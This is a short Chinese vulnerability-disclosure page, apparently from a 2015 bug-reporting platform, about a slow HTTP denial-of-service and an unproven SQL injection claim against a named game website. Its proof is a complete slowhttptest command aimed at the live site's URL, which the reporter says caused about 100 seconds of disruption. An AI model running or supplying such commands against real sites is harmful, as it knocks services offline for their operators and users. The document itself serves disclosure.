漏洞概要
关注数(24)
关注此漏洞
漏洞标题:91Game手游网slow http dos拒绝服务与SQL注射漏洞
提交时间:2015-06-16 18:01
修复时间:2015-07-31 18:02
公开时间:2015-07-31 18:02
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情
披露状态:
2015-06-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-31: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
当然、这是个没有注册的厂商,91、9game、91game傻傻分不清楚,来发,主要是slow http dos的样例并不多,而且这个站还有很多注入很多跨站我会说?
详细说明:
我用扫描器我会说?
站点地址:http://g.91game.com:80/
漏洞证明:
证明,其实只要装个slowhttptest就行了:
命令是:slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://g.91game.com:80 -x 10 -p 5 -l 100
造成100秒伤害:
至于注入什么的~~~
求不认领~~~
修复方案:
漏洞回应